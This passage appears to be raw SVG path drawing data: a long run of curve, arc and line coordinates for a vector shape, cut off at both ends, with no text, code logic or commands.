5.4-.6-.8-.3-3.3-.9a41.57,41.57,0,0,1-7.2-.9c-.7-.8,1.5-.6,1.5-1,1.3.5,1.1.9,3.6,1.5,3.7.1-2.3-1.7,2.3-1.3-2.6.1,2.7.9,4.6,1.5,1.3-.1,3.3.7,4.1.6a16.33,16.33,0,0,1-4.4-1.1c3.3.5,4.5.1,7.1.7-1.6-.8-6.3-2.3.2-1.8,1.1.4-3-.1.2.5,0-.1.8,0,1.1.2.5.4-4.8-.9-3-.2,5.3,1,4.4,1.7,7,2.6-2.9-.6-1.9-.1-3-.2a11.42,11.42,0,0,1,3.1.8,3.7,3.7,0,0,0,1.1.1,5.44,5.44,0,0,1-1.1-.3c-.4-.1-.3-.1,0-.1.7,0,2.4.2,1.9,0a6.07,6.07,0,0,1-1.9-.5c-.3-.1-.2-.2,0-.3s1-.3,0-.7a4.76,4.76,0,0,0-.9-.3,3,3,0,0,1,.9.2,18.66,18.66,0,0,1,3.4.7c-.3,0-2.4,0,.2.5.2-.2,1.5-.2.7-.7-1.9-.3-2.5-.5-2.3-.7-.8-.1-1.4-.2-2-.3a14.26,14.26,0,0,1-3.4-.8c1.6.2,2.6.5,3.4.6s1.4.3,1.8.1c-.6-.1-1.2-.3-1.8-.4-3.5-.8-6.3-1.5-9.1-2.2,3.4.7,2.5.2,4.1.5a2.76,2.76,0,0,0,1.2.4c-1.3-.7,2.9.6,3.9.5h0c-6.8-1.3-1.7-.7-6.5-1.9,3.4.7,2.2.5,4.2.6.4.6.3.2,2.4.5.3,0,.5.1.8.1A8.44,8.44,0,0,0,880,5a16.62,16.62,0,0,0-2-.3q-.45,0,0,.3a5,5,0,0,0,1.2.3c.3-.2,5.5.8,6.3,1a20.88,20.88,0,0,0-5.8-2c.7-.4,1.3-.8,5.9.2.3.3-2.2-.1-2.9,0,2.8.9,3.8,1.6,5.9,2.2-1.8-.6,4.4.4,4.1.6-1.3.1-4.4.1-.7.7-5.8-.8-3.1.4-7.9-.3-.3.3,2.8.9,4.5,1.3-2.7-.4-1.5.2-2.9.1a19.45,19.45,0,0,0-5.1-.6c3.2.6-1.6.5,1.3.7a6.05,6.05,0,0,1,1.9,0c-.3.3,1.7.7,2.4,1.1,3.6.6,1.4-.3,6.1.7a2.68,2.68,0,0,1-1.8.3c-.7-.4-1.9,0-4.1-.5,1.6.7.2.6.6,1.2,5.6.9.4-.4,1.6-.7,8,1.3,6.8.2,13.1,1.1-1.2-.6-4.9-1.1-1.4-.9l-5.2-.9c-.3.3,3.3.8,2.4,1.1a8.82,8.82,0,0,1-2.9,0c-.5-.4-1.7-.7-2.6-1.3,3.7.7.9-.4,3.9.1-7.5-1.1-3.6.3-9.8-.3,1.4-.3,2.1-1,9.5-.3-.4-.3-1.7-.2-2.2-.5,1.1.2,1.2,0-.1-.2.6.3-2.5.1-3-.2,1.4-.1,1.4-.5,3.8-.3,2.2.4,1.2.6,3.4,1,.5-.1,1.4,0,1.9-.1-2.1-.4-6.9-1.5-3.4-1.1,1.9,1,1.7-.8,7,.5-.6-.4-3.5-.9-2.5-1.2,4.5,1,1.8.1,4,.3,2.2,1.6,4.5,3.7-2.5,2.9,1.2.9.6,1.1,1.8,1.7,1.4.2,2.3.4,3.2.6-.3-.4,4.5.5,5,.3-3.1-.4-5.1-.7-6.3-1,.7-.2-3.5-1.2-.4-.8,1.3.3,1.4.6,1.4.9,3.9.5,8.6.7,5.7-.3,0,.3.1.6-2.9.1.7-1.2-3.9-3.6,4.7-2.5.9.1,1.8.2,3,.4-4.1-.9,5.8.5.7-.7-1.1-.1-.1.4-3-.2a.74.74,0,0,0-.7-.3,9.16,9.16,0,0,1-2.5-.2c-.1-.2-.2-.5-.3-.7-4.5-.8-3.2,0-7.1-.6,3-.3,15.4.5,4.1-1.5a.26.26,0,0,0-.1-.2c2.5.3,4.5,1.1,5.2.9-1.6-.4-3.4-.7-3.4-1,4.7.8-1.1-.7,1.7-.5l2.4.7c2.5.9,2.4,1.6,1.9,2.1a9.18,9.18,0,0,1,2.2.6c4.2.9,5.2.4,7.3,1.1-2-.1-2-.2.2.4-2.9-.4-3.9-.2-3.7.3,5.7,1-.1-.4,2.9-.1,5.7,2.1-1,1.4,1.4,2.9,4.8,1,2.7,1.1,7.6,1.8-4-.5-6.4-.6-8.4-1.4-.8.2,3.2,1.3,4.5,1.3-.9-.3,2.8.7,3,.2a14.34,14.34,0,0,1,3.5,1.2c-1.9-.1-1.9-.4-5.2-.9-.4.4-.4.3.4.8,1.4.5,3.8.4,5.3,1a25.66,25.66,0,0,0-4.8,0c6.8,1.7,2.8,1.9,3.2,2.8-2.5-.5-7.1-1-4-.3,1.4.1,3.5.3,6.1.7-1.6.1-3.3-.1-.6.8-5.5-.9.3.6-3.8.1,1.6.3,5.4.8,5.3,1a.35.35,0,0,0,.1.2c-3.8-.6-5.1-1.1-8.5-1.6-1.3.2,4.7.8,3.4,1,3,.6,2.6.3,5.2.8-.8.4,3.2,1.6-1.3,1.3,4.1.8,2.2.8,3.5,1.2-.7.1-5.1-.9-4-.3,2,.3,2.4.5,4.2.8.1-.1.2-.2,2,.1,7.5,1.6,2.5,1.8,2.1,2.3-.1.1,5.3,2-1.8.4,1.2.5,2,1.1-2.8.2.5-.1,2.4.1,1.8-.4-3.1-.5-3.7-.9-6.5-1.4,1,.7-3-.7-1.9,0,.5.4,5.2.6,6.4,1.2a8.82,8.82,0,0,1-2.9,0c-.3-.2-2.4-.5-3.3-.8-.5.1-2.5.4-.6.8,1.8.2-.3-.6,1.8-.3s8.7,1.7,2.2.5c-.1.4,6.1,1.1,4.5,1.4a17.2,17.2,0,0,0-3.2-.5c.1.4,2.7.4,4.4,1.1a26.83,26.83,0,0,1-4-.3c3.2.9-1.8,1,4.6,1.5a2.68,2.68,0,0,1-1.8.3.17.17,0,0,1-.23.07.18.18,0,0,1-.07-.23l0,0a.16.16,0,0,1,.23,0h-.6c-.8-.2-1.6-.2-3.6-.6.2.2.3.3.3.4h-.3c-.9.2-.7.3,0,.4a6.32,6.32,0,0,1-1.3.4c2.5.6,3.8.3,4.2.7-2.7-.4,1.5.4.2.5-1.5-.2-3.9-.7-4.1-.6.3.5,2.4,1.4-1.5.9-.6-.3.9-.4-1.3-.8-2.9,0,3,1.3.6,1.2,1.4.2,2.8.5,4.2.7-.1.4,4.1,1.5-2.7.4,2.1-.1-3.8-1.5-7.7-1.9,0,.3.9.9-.6.8,1.5.5,3.1.3,4.2.8-1.6.1,4.4,2.1,2,2.2,2.1.2.6-.5,3.9.1,3.8,1.4-2.7,1.2-1,2.1a12.25,12.25,0,0,1,2.9-.1c1.6.8-1.6.7-1.2,1.6.1.2,1.9.4,2.2.6-.1.5-5.3.2-8.8-.2,7,1.3,6.3.5,9.1.7,2.7,1-2.8.3.6,1.3,1.6.2-.5-.6,2.9,0-2.1-1.3-5-2.8.8-2.4-1.8.4.8.4,3.5,1.2-.2.3-4,.2-2.7.6a5.85,5.85,0,0,1,2,.2c2.5.8-2.3.6.5,1-.2-.2.7-.2,1.9,0,2.7,1.4-1.9,1.2,3.2,2.6-7-1.1,1.5,1.9-5.4.9-.6-1.2.4-1.6-1.2-2.6-2.6-.2-2-.7-3.4-1.1-4.9-.2,1.3,1.7,3.1,2.5-1.3-.2-1.4-.1-3.1-.4.5-.3-2-.8-1.5-1.1-1.8-.2-5.6-.9-5.1-.5,2,.4,2.3.2,4.1.6a7.72,7.72,0,0,1,.4,1c-7-1-6.7-1.2-13.7-2.4,0-.1,1.3.1.9-.2a59.9,59.9,0,0,1-12-3c-2.9-.1,4.1,1.1,2.6,1.4a17,17,0,0,0-3.1-.5c3.3.5.7.7,4.4,1.2q-.45-.45,1.8-.3c.1.2,1.9.4,2.2.6,1.1.5-1.5.1-1.8.3a10.32,10.32,0,0,1,2.2.5c4.2.8-1.3-.6,4,.3,6.7,1.6,14.6,2.5,12.1,3.1-5.3-.6-2.6.3-1.4,1.1-1.4-.2-2.3-.4-3.2-.6-.3.2-2.8.7,1.7,1.5,2.3.4-1.5-.5-.3-.6,3.4.7,1.2-.2,4,.3,1.6,1.2-.5,1-5.7.3.4,1.1-2.3,1.2-2.7,2.6,2.5.6,3.8.3,4.2.7-1.7.1.8.6.5,1.1-1.6-.4-2.6-.6-3.1-.4,3.7,1-3.4,0,2.4,1.1-.3.2-3.2-.2-5-.4,1.4.4,3.9.8,5.4,1.1.5.3,0,.4-.8.4,1.4.4,3.9.8,5.4,1.1-1.1-.6,2-.1,3.9.1.5-.2-1.1-.5-1.4-.7.1,0,.2-.1.3-.1,1.3.2,2.6.4,4,.7.7.5-2.3.1,1.3.8,3.9.2-7.4-2-2.9-2-.5.5,2.8.6,4.4,1.1-.9-.8,9.8-.5,10.1.9,3.6.7,3.7.4,4,.2q-4.05-.6-3.3-.9c-1.9-.4-6.1-.9-6.4-1.2.7-.2,1.7-.4-1.5-1.1,4.7-1,1.1-3.8,2.2-5.6,1,.6,1,.6.4,1,6.1,1,2.7,1,3.5,1.2.9-.2,1.2.5,3.1.5,1,1-.8,1.4,4.2,2.8-.3-.9,6.7,1.5,6.2.8-6.4-1.5-5.3-2.1-1.9-2.1-1.2-.2-3-.5-3.2-.6,3.6.3,3.8,1.1,5.6,1.6A27,27,0,0,0,979,53c1.6.4,3.4.7,3.4,1-.8.3-2.1-.1-.7.7-1.4-.2-2.3-.4-3.2-.6-.1.3,2.5.8,2.4,1.1l-5.3-.9a31.71,31.71,0,0,1,8,2.7c1.6-.4,10.3.2,6.3-1.1,1.8.3,6.3.7,7.3,1.1-2.3.1-3.4-.1-.5.9-1.3-.2-1.5-.4-3.2-.6.4,1-7.2-.8-6.7.2a51.94,51.94,0,0,1,5.5,1.5c.5-.2,4.9.8,5.3,1-2.1-.1-2.7,0,1.2.4-2.3,0-.3,1.3-4.5.8-2.5-.4-3.2-.7-6.4-1.2-3.1-1.1-1.5-1.9-2.2-2.7a37.31,37.31,0,0,0-4.1-.5q3.45.6,3.3.9a52.82,52.82,0,0,1-5.3-.9c.3.3.5.6-1.8.3-.1-.2-.1-.3-.2-.5-5.2-.9-7.1-.4-5.7.2a12,12,0,0,1,3,.2c.3.2,1.8.5,2.3.7-.6.3-3.6-.5-5.1-.5,3,.7-2.3-.3-2-.1,1.6.4,3.4.7,3.4,1-1.6-.2-3.9-.7-4.1-.6,8.6,2.5-5.1.9,2.6,3.4a12.75,12.75,0,0,0-3.9-.1c3.9.6,5.7.7,9.3,1.2-.5-.6-1.4-1.8,3.3-1.2.3.3,2.6,1.1-.6.8,1.6.3,3.9.6,4.3.8-1.8.9,3.4,3.4-.1,3.9.2-.2,4.6.7,5.1.6-4.3-1.1-3.3-1.5.4-1.3-3.7-1.3-2.3-2.3-3.4-3.2,5.8.9,6.7.1,11.1,1,.5-.2-1.8-1.2.5-.9.4.4,3.5.9,4.5,1.3.8-.1,2.2-.1,1.6-.6,2.6.5,3.4.8,4.1.6-.7-1-2.6-2.4,3.8-2.3,6.1,1.2,2.8,1.4,4.9,2.1,1.9-.1,0,.5,2.3.8.1-.3,6.4.8,7.3,1.2-.8.1-2.4,0-6.1-.7.3.3.5.7,3.4,1.1-2.2-1,5.5.8,5.1.5a19,19,0,0,1-3.3-.9c6.1,1,.3-.5-1.5-1,3,.2-4.4-2.3,2.1-1.8,1.4.6,2.5,1,1.5,1.1,4.3.8,6.6,1.5,7.8,2.2-2-.1-2.1-.4-4.3-.8.6.4,6.7,1.9,1.5,1.3a9.61,9.61,0,0,0-3.4-1c3.3,1.2,9.9,2.8,10.3,3.5,1.8.3,3.2.5,4.1.6,2.1,1.4,8.2,3.5,2.3,2.9.9.5-.8.9,1.7,1.5.7-.3,5.8.6,4.9.1a66,66,0,0,0,6.7,2c-2.3-.3-1.5.2-1.8.5-.1.1-.3.1-.9.1a2.7,2.7,0,0,0-.8-.1c-1.2-.3.9-.4-1.5-.7-1.7,0-2.6.2-3,.6-1.1.9,1.1,2.6-3.2,2.7-3.2-.8,2.5-.5-2.7-1.6-2.3,0-.8.9-3.4,1-3.9-.6-4.7-1-4.5-1.3,6.2,1,2.3-1.1,10,.7-2.6-1-3.5-1.7.3-1.5-.1,0-.2-.1-.4-.1-1.1-.3-3.7-.7-3-.9a15.44,15.44,0,0,1,3.3.8c-4.8-1.4-1.7-2.9-7-4.6a37.91,37.91,0,0,0,4.1.5c-2.5-.5-3-.9-5.5-1.4,1.3.6-2,0-2.9.1,1.5.3,3.9,1.2,1.4.9s-1.3-.5-3.3-.9c-.2.1.1.2-.9.1a2.67,2.67,0,0,0-1.2-.4c-.1.5,6.8,2.3,1.8,1.7.9-.3-3.6-.8-4.4-1.2,2.2-.1-1.8-1.6-2.9-2,1.4.9-5.6-.4-6.9-.1-1.7-.7,2.8.2,1.8-.3a49.24,49.24,0,0,0-10.2-1.1c.6-.2-2.3-.6-3.3-.9-1.5,0,.3,1-5-.3-.2.3,1.6,1.1-1.7.6-2.3-.6-.1-.9-4.6-1.7,13.3,4.2-14.6.3-5,3.7-5-1-4.5-.5-6.1-.6-3.9-.8-6.9-1.6-9.8-2.4,1.9.1,0-.3-.3-.6,1.7,0,4.1.7,4,.3-1.8-.3-3.2-.5-4.1-.6-.8-.6.6-.6,1.4-1.2-3.6-.8-3.7-1.1-7.5-1.6,1.8,1.1-2.2.7,3,2.3-2.3-.7-10.8-1.5-5-.3.1-.2-.6-.5.8-.3,1.6.3,3.8.6,4.2.8-.8.3,3.6,1.4-1.7.5,1.3.1,1.2-.2-1.3-.7.1.4-1.9-.3-3-.2,2.9.8,3.6,1.8.7,1.6-1.1-.2-2.1-.3-3.1-.5,2-.2-7.3-2-2.4-.9-2.4.4,6.9,2.3,10.1,3,.6.4-3.9-.5-4-.3,4.8.8,5.1,1.5,7.8,2.2-.5-.3,3.7.2,4.1.6-1.8.4,1,2.2-2.9,2.1-1.9-.4-3.4-.9-4.2-.7,7.2,1.2-1.6.7,1.7,1.5,3.6.7,1.1-.3,5.1.5-.5.3,1.6.7,3.4,1.1a13.75,13.75,0,0,1,2.2.6c-3.6-.1-2.1,1.5.1,2.4,3.5.4-1.5-.9,2.8-.3,2.2.5,6.6,1.2,8.6,1.8-1.2,0,.8.9,2.6,1.4a6,6,0,0,1,4.1.6c1.6-.7-2.4-1.9-1.2-2.7a39.56,39.56,0,0,1-4.3-.9c1.8.2-.3-.6,1.8-.3,3.7.6,1.6.9,5.6,1.6.7-.2-4-2,1.5-1l-.3-.6c-7.3-1.2-4.1-2.1,1.6-.7.8-.4-1.4-1.6,4.6-.6-2,.3-1.3,1,2,2.1.3-.2,2.9.3,1.8-.3-2.8-.4-2.1-.6-3.3-.9,2.4.4.8-.4,2.9-.1,3.4.7,3.2.3,5.1.6,3.3,1.1-.7,1-1.3,1.3,4.1.7.6-.5,3.9,0,1.7.3.7.4,2.3.7,2.3.3-.9-.9,1.6-.6,1.5.5,1.1.9,4.6,1.5a32.09,32.09,0,0,1-4.7.2c3.7.4,4.6,1.3,10.8,2.5-4.2-1.2-9.4-2.9-1.9-2.1-1.6-.8-2.3-1.8,1.2-1.6a38,38,0,0,0,5.6,1.6c4.4.5-3.5-1.4-.6-1.3.2.2.4.3,2.2.6.1-.3-2.2-.7-3.4-1.1a31.24,31.24,0,0,1,7.2,1c-3.5.8.5,2.7-5.3,3.1-2.3-1.3,5.4-.9-2.2-2.6,3,1-2.9.2,1.6,1.3-1.6.2-6.2-.5-3.7.4-1.1-.6,2.7.3,3.1.5-1,.2-1.1.1-1.7.5,5.6,1,3,1.6,9,2.6-6.5-2.2.5-2.1,4.7-2.3-1.7-.6-4.2-.5-5.3-1a12,12,0,0,1,3,.2c5.3,1.2,3.9.6,9.3,1.2,2,1-4.8-.4-4.9,0,.7.4,5.4,1.6,3.6,1.5a21,21,0,0,1-2.2-.6c-.5.1-1.4,0-1.9.1a24.16,24.16,0,0,1,4.3.9c-5.2-.8-8.7-1.1-9-.6,1.8.3,2.6.3,3.2.5-2.2,0-1.9.7-4.6.6,3.5.8.1.5,2.6,1.3-4.8-.8.8,1.1-3.7.4.8.2,1.3.3,1.2.4,10.3,1.9,2.8-1,8.5-.4-.4.6,2.4.8,3.2.6,5.6,1.8-7.7.5-1.2,1.7-.2.2-5.5.1-2.7.4,1.5-.3.8,0,5.2.8,2.2.3-2.6-1.1.6-.8,1.5.3,1.1,1,2.3.8-.9-.6-.1-.5-2.5-1.2,1.1,0,3.9.5,5.1.5-.9-.3-5.1-.8-4.4-1.1,11.2,1.7,4.3-.9,9.4-.7,3.9,2.2,1,3.2,2.1,4.5a6.26,6.26,0,0,1,2.1.4c.1.1.1.2.2.4-2.4-.4-4-.7-5.2-.8,2.6.9-2.2.1-2.7.4,2.9,1.3,1.2,3.2-1.3,3.5-.3.5,2.1,2.8-4.8,2.2,1.6.3,3.9.6,4.3.8a23.15,23.15,0,0,0-4.1,1.5c1.4.3,4,.6,4.2.8-.9.1-3.8-.4-5-.4,6.8,1.7-3.7.7,1,2.2,5.1.7,1.4-.3-.2-.5a2.7,2.7,0,0,1,1.8-.3c.1.5,1.6.3,3.1.5,1.3.4,1.3.5.2.5,8.3,1.4.4-1.1.2-1.6s7.8,1,6.9.3a15,15,0,0,0-3-.3c-1.6-.8-3.9-1.8.3-1.4.9.5,4.4.8,4.1.5-2.6-.6-1.2-.6-3.6-1.4,5.1,1.1.6-.6,6.2.8-.3-.6-3.1-.7-4.5-1.3,4.2.4-.8-.1-1.3-.7a20.19,20.19,0,0,1,4.1.6c.5-.5-2.8-1.5-.7-1.6-1.5-.4-3.3-.7-4.4-1.1,1.1-.3,2.3-.5,1.3-1.3,8,1.4,6.8-.5,12.6,0-1.07-.15-2.14-.35-3.2-.6.2-.3,6.1.8,2.9-.1-3.6-.7-1.1.3-5.1-.5-1.3-.8-4.5-2.4-2.2-2.6-1.1.2,4,1.3,4.4,1.2-1.7-.6-4.4-1.2-4.6-1.7,1.4.3,3.9.8,5.4,1.1,1.1-.4-1.9-1.6-.8-1.8a9.18,9.18,0,0,1,2.2.6c1.3,1-3.2,1.5,2.3,2.8-1.9-1.1,3.1-1.3-.4-2.8,5.8,1-2.5-1.9,4.4-1.1-5.2-2-2-3.5,2.2-3.6a12.82,12.82,0,0,0,2.1.5,4.69,4.69,0,0,0-2.4-1.1c-.1.1-.2.2-2-.1-.4-.8,1-.8.3-1.4,1.6.3,2.7.6,4.3.9-1.7-1,3.2-.1,1.4-1.1-2.9-.4-2.8-.1-5.2-.9,3,.5,2.5.1,4,.2-1.7-.5-4.3-.5-5.3-1.1.4-.6-.8-.8-1.8-1.7,4.1.7,3.6-.1,7.2.9.3-.6,2.8-.4-1.7-1.5,3.3.7,4,.4,7.4,1.3.1-.2-1.3-.5-1.3-.7-2.3-.3-5.6-.7-6.4-1.2,1.3-.8,3.8-1.5,1.7-2.7a15.78,15.78,0,0,0-2.4-1c1.8.3,3.3.6,4.3.8l-.3-.6q-4.05-.6-3.3-.9c4.5,1,1.9.1,6.2.8,2.1.7.6.8-.9.9a4.82,4.82,0,0,0-1.5.3c5.8,1.2,4.4,2.3,1.6,2.1,5.9.5,5.3-1.2,3.4-1.9a22.29,22.29,0,0,1,2.7-.2c1.7-.1,3.3-.3,3.6-.8a9.76,9.76,0,0,1-3.3-.9c-3.2-.6-3-.3-6.2-.9-1.3.2,3,.7,2.4,1-5.1-1-2.4.1-7.2-.9.6-.4,4.9-.4-.7-1.6l-.3-.6c1.4.3,3.9.8,5.4,1.1.2-.6-5.5-.8-5.5-1.5,1.7.1,4.3.5.8-.3,3.4.2,5.8,1.2,7.4,1.2-1.7-.3-2.1-1.1-.4-.8a24.16,24.16,0,0,1,4.3.9c-5.4-1.1.8.8.5,1.1-1.5-.1-4.2-.6-5.1-.5,5.1.9.8.7.4.8,6.7,1,5.1.1,5.8,0,3.3.5.9.5,4.5,1.3-1.1-.6-4.2-1.6.5-1-2.7-.5.7-.7-4.5-1.3-1.3.1,3.1,1.1.3.7-4.9-1.3.3-.7,1.5-.9-3.5-.7-.6.3-4.1-.5,0-.1-.9-.3-1.2-.4-.6-.7,1.7-.4,4.7-.3-.8-.4-1.6-.1-3.1-.4,0-.2-.6-.3-1.2-.5a17.85,17.85,0,0,1,4,.3c2.7.4,1,.6,4.4,1.1-1-.6-1.4-.8.6-.8-1-.4-4.6-1-4.5-1.3s2.7.2,2.9,0c-1.6-.4-3.1-1.4-.7-1.4-2.1-.5-2.9-.9-4.5-1.3-.8.4,1.7,1.1-1.6.7a13,13,0,0,0-2.3-.7c0,.3,1.8.6,2.4,1-6.5-1.2-.5.6-2.8.3-1.4-.3-2.1-.5-4.2-.8,3,1.1,4.8,2.4-1.1,1.8,6.1.9,1.9,1.5-2.8.2.3.6,3.1.7,4.5,1.3-2-.3-2.5-.2-5.1-.6-5.9-2-1.8-1.9,2.9-2.1-3.3-1.3-1.1-1.2-2.8-1.9,1.1.2,2.1.3,3.1.5-2.9-.6-1.5-1.5-4.7-1.7,2.7.7,1.1,1.1-1.6.7-1.1-.9,1.2-.9.2-1.8a19.5,19.5,0,0,0,5.1.6c-6.1-1-4.5-1.5-1.3-.8-1.3-1.2,3.1-1.5-.6-3.3,4.1.5,4.1-.2,1.5-1,1.4.2,2.3.4,3.2.6-1.4-.7.9-.4,2.8-.2-3-.9-3.6-.2-5.2-.8a7.88,7.88,0,0,1,3.8-.1c0-.8-3.4-3,.5-3-3.6-1.3-4.9-5.3,1.6-2.7.7-.7-1.2-1.9-1.1-2.4.6.7.6-.1,4.2.7-1.1-.5-1.5-.6.8-.4-4.9-.9,1.4-.5-2.6-1.4,0,.1-.8,0-1.1-.2,2.8.4,2.6.3,6.2.8,2.8.7.8.5,2.5,1.2,3.6.4,3.5.7,6.4,1.3-2.3-1.8-.8-1.4.9-2.3-3.9-.7-1,.4-3.9-.1l-.3-.6c-2-.3-3.5-.5-4.1-.5,3.9.6-.5.3,3.4,1-.8,0-.6.3-4-.3-.3-.3.8-.4-2.3-.8.9.4,1.8.8-.7.5-3.9-1.3.7-1.9-3.6-3.5a4.17,4.17,0,0,0,2.6-.4c2.1.1,4.2.1,6.1.3a9,9,0,0,1,2-.2,3.87,3.87,0,0,0,1.9.3,4.17,4.17,0,0,1-1.1-.3h2.3c-.5.3,1.4.4,1.5.7,6.9.4,16.6.6,21.8,1.2.4-.4-5.3-.5-2.6-.7,2.8.1,2.5.4,5.5.4.6.2.7.5,3.5.5-1.6-.3,2.5-.4-.3-.4h1.3c.2.1.5.1.7.2-.2-.1-.3-.1-.4-.2,1.8-.1,3-.2,5.5-.2.4.4,2.2.6,4.1.7a19.51,19.51,0,0,0,5.5-.3c4.4.2,5.8.5,10.1,1-4.4.3-6.2-.1-10.6-.2-2,.8,13.9.9,10.8.4,2.7.2,2.1.4,1.5.7,3.4,0,1.7.4,4.5.4-.5-.3,0-.4,1.8-.4,1.2.2,1.3.4,2.5.6,7.5,0,9.1.2,18.1.4a16.36,16.36,0,0,1,3.8-.6,42.76,42.76,0,0,0,6.5.2c0,.2.5.3,1.3.5,4.5.2,4-.1,7.3-.1.1.3,1.1.7-.5.9,2,0,2.4.2,4.3.2,1.2-.3-3.5-.7-.5-.8s4,.5,2.5.6c6.2.3,12.7,1.9,18.4.9.4.2,1.7.2,1.4.5,4.7-.1,5.6.1,8.3-.2.4.2,1.9.2,2.3.4,1.1.3-1.3.3-.7.5,7.8.7,22.3.4,14.2-.8a38.38,38.38,0,0,1,6.6.5c-.9.4-2.6.7-2.4,1.2-5.2.3-11.2.6-17.1.6h0a109.94,109.94,0,0,1-14.5-.9c-3.6-.5-.9-.8-7.1-1.1.7.5,2,.7-.4,1,8.7,0,2.4,1.4,6.5,1.9-1.1.1-4.3,0-4,.4.8.2,2.5.4,3.6.6-3,.4.2,1.1-.8,2.1a14.87,14.87,0,0,1-2.2-.2c2.9,1.2-2.9,2.2,4.3,3.4-.4.4-3.2.6-2.4,1.2-3.3-.1-5,0-7.3.1,13.3,1.8,42.6,1.7,42.7-.4,8-.9,11.9-2.1,10.1-3.7,3.1-.1,3.7.2,6.3,0-1.4-.8,1.1-1.2,5.4-1.4-3.2-.1.9-.2-.3-.4-1.6.1-3.9.3-8.2.4,0-1.2-7-1.7-3.8-2.6,9.3.5,12.6,1.4,24.2,1.7,3.1,0,2.5-.5,7.1-.4,0-.2-.5-.3-1.3-.5a38.13,38.13,0,0,0,4-.2c2.9-.3,2.3-.9.3-1.6a.42.42,0,0,1-.2-.1h.34c3.4,0,4.8.1,4.8-.2,3.4-.1,1,.4,4.4.3a8.21,8.21,0,0,1,2.1-.1c-.1-.2-.5-.3-1.4-.5,8.5-.2,8.5-2.7,21.2-1.2,0,.3,1.3.8-.4,1,6.4.3.9.9,5.1,1.4-.3-.8,2.5-1-2.1-1.6,6.7.3,7.9-.3,10.7.3.7-.5,1.7-.7,3.6-.9,1.1.3,2.6-.1,5.3.1-.8.5,2.4.7,4.8,1-4.2.1-5,.6-5.5,1.2a13.54,13.54,0,0,1,3.3.2c-2.2.2-3.7.5-2.5,1,5.3,0,7.9.4,11.7.2,2.8.9,10.5.4,15.4.9-2-.5,2-1-3.1-1.4,3.1-.2,6.4-.3,8-.6-8.6-.2-4-1.4,1.2-1.4-1.4-.4-3.3-.7-4.9-1.1,1.1,0,1.2-.1,2-.1,4.3.2,5.4.6,5.8.9-.3-.2.9-.2,3-.2-.7-.3-3-.8.6-.8,1.6.3.1.8,2.6.7-2.5-.6,3.7.2,6.2-.2,2.7.3.4.7.6,1,2.8.2,3.3,0,4.3.2-.5,1.1,2.1,1.9,1.7,2.5.7-.4,5.2.1,5.5.4-4.3,0,1.5.6-1.6.7-2.7-.3-1.9-.4-1.6-.8-3.3-.2-3.6,0-6.5-.2-1.4.4,4.6.1,4.5.4s.7.4-.8.4c-1.7,0-1-.3-3.3-.3.3.5-1.8.5-6.1.3-.2.3-.8.2-2.8.5,2,.1,2.3-.1,4.2,0,1.2.2,1.3.4,2.5.6-1.8-.3-6.3.2-2.8.5l3-.3c.5.6-4.6.6-1.4,1.1.2-.1,2.2-.1,3-.2-2,.2.1.7,2.6.8-.5-.3-2.6-.5.7-.5,2.6.6,12.9.1,7.1-.3,1,.9-9.5-.2-2,.2.7-.3-3.6-.2-3.5-.5,11.5,0,5.9.8,13.4,1.3-2.1-.3-3.3-.7-.6-.9,9.6.1,15.1-.6,15.7-1.3h.3c.8.3,4.2.3,6.6.5-.6-.5,2.1-.4,7.1-.4-2.2-.4-2.7-.5-.5-.8-1.5-.2-5.2-.2-5.5-.4.5-.3,1.5-.8,5-.4-1.6-.5.8-1-5-1.3a15.32,15.32,0,0,1-1.9.3c-.1-.1-.1-.2-.2-.3-7.8.5-16.3-1.3-8.3-1.5-.1.1.4.8,1.3.5q-1.2-.45,3-.3c-1.6.1.8.5,3.6.6-1.4-.5,1.3-.5,2.7-.6-5-.6-3.1-1.6-7.9-2.5a27.31,27.31,0,0,0,3-.2c.2.2.1.4,2.4.4.6-.6-3.6-.8-4-1.3,3.2,0,4.4-.3-.1-.2-1-.5-.2-.8,4.9-.6a24.64,24.64,0,0,0,3.7.8c.6-.3,3.2-.3,3.8-.6,1.8,0,.8.3,2.3.4,2.5-.3-.1-.4-2.3-.6a9.16,9.16,0,0,0-2.6-.4c-.1-.1-.2-.3-.3-.4,1.6,0,3.9.1,4.2,0-4.1-.1-5.7-.2-7.6-.4-.5-.3,3-.1,3-.3-1.3,0-1.3-.2-1.3-.4-2.5-.1-6.9-.6-6.3,0,2.5.2,3.8-.2,4.2.1.7.4-2.5.3-4,.4-2.9-.3.4-1-.9-1.3,0,.2-2.6.1-2.2-.2,3.2,0,3.3.3,6.4.2.6-.5-2.2-.7-2.8-1,1.4,0,1.4-.1,3.1,0,1.8.4-4.4-1.2-6.3-1.7h.4c2.4.3,1.8.5,3.3.8,2.1-.1,1.1-.4.1-.7,1.6.1,3.6.2,4.9.4,1.1.3-2.8.5.5.8-.4-.4,1.1-.6,3-.7.4.1.8.1,1.1.2,1.3.3,5.2.2,7.4.6-.8.2-7.4.7-4.8.7a8.21,8.21,0,0,1,2.1-.1c.1.1.1.1.1.2-.4,0-.7.1-.6.1h.5a3.36,3.36,0,0,1-.6.3c-.7-.1-1.5-.1-2.6-.2,1.7.7-4,.9.2,1.7h2.3a4,4,0,0,1,.5.1c0,.1.1.1.1.2-1.3.1-1.1-.1-3.7-.1-.7.3,1.8.3,3.9.3.9.7,2.7,1.3-1.4,1.6,4.5.4,2,1.2,7,1.6,0-.3.4-.6.4-.9.8-.1,1.5-.1,2.3-.2h-2.4c-.1-.2-.4-.3-1-.5a16.21,16.21,0,0,0,2.2-.2,8.1,8.1,0,0,0,2.2,0,2.08,2.08,0,0,1,.7.1c0-.2,2.5-.2,5.2-.1,1.2-.5.7-1.1,3-1.8-3.8-.1-1.8.5-6.1.3-.2-.1-.2-.1-.1-.1h.4a5.6,5.6,0,0,0,.7-.2,3.88,3.88,0,0,0,.9-.1h-.7a3.25,3.25,0,0,0-1.3-.3,23.14,23.14,0,0,1,3,.2c.3-.3,3-.8.3-1.1.1.3-1.7.3-2.8.5-7-1.2,7.3-1.1,12-1a11.71,11.71,0,0,1,3.8-.6c4.6.1,1.8.9,6.9.9,1.2-.2-4.4-.4-1.3-.5a12.28,12.28,0,0,0,2.9.2,4.76,4.76,0,0,0,.7.3h-.1c-.1.2.5.3,1.5.3.6.1,1.4.3,2.1.4-.4-.1-.5-.2-.4-.3,2.7.1,6.1.1,6.8.4-.6.1-1.9.5,1.4.6,2.9.1-1.4-.6,2.9-.4,1.8,0,.8.3,2.4.4.7-.3,2.8.2,5.3.1.2-.3-.8-.7,3.8-.7-5.8-.1-3.6-.4-7.5-.2a15.33,15.33,0,0,1,5.1-.2c-1.2-1.1,1.3-